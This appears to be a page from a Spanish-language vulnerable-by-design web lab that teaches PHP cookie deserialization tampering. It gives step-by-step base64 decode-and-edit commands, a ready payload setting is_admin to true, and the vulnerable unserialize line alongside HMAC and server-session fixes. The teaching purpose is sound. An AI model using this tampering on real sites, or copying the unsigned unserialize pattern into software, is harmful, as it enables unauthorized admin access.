🧑‍💼 Preferencias de Cuenta

Usuario: guest

← Volver

Tus preferencias

Nombre de usuario

Tema

Idioma

Recibir notificaciones

🔴 Cookie NEXO_PREFS (vulnerable)

Base64:

Decodificado (objeto serializado):

is_admin actual: false (b:0)

🔓 Cómo escalar privilegios

Copiá el valor de la cookie (Base64)
Decodificá: echo "..." | base64 -d
Buscá is_admin";b:0
Cambialo a is_admin";b:1
Re-encodá: echo "..." | base64
Reemplazá la cookie en DevTools
Recargá la página

Ejemplo de payload escalado:


                        Tzo5OiJVc2VyUHJlZnMiOjU6e3M6ODoidXNlcm5hbWUiO3M6NToiZ3Vlc3QiO3M6ODoiaXNfYWRtaW4iO2I6MTtzOjU6InRoZW1lIjtzOjU6ImxpZ2h0IjtzOjg6Imxhbmd1YWdlIjtzOjI6ImVzIjtzOjEzOiJub3RpZmljYXRpb25zIjtiOjE7fQ==

# 1. Decodificá la cookie actual (base64):
echo "BASE64_AQUI" | base64 -d

# 2. Vas a ver algo como:
# O:4:"User":3:{s:8:"username";s:5:"alice";s:8:"is_admin";b:0;s:5:"theme";s:5:"light";}

# 3. Cambiá is_admin de b:0 a b:1:
# ...s:8:"is_admin";b:1;...

# 4. Re-encodá en base64 y reemplazá la cookie

Herramientas: base64 Burp Suite DevTools

// VULNERABLE (actual):
$prefs = unserialize(base64_decode($cookie));

// SEGURO - firmar con HMAC:
$data = base64_decode($cookie);
$signature = hash_hmac("sha256", $data, SECRET_KEY);
// Verificar firma antes de deserializar

// MEJOR AÚN - no serializar en cookies:
// Guardar prefs en la sesión del servidor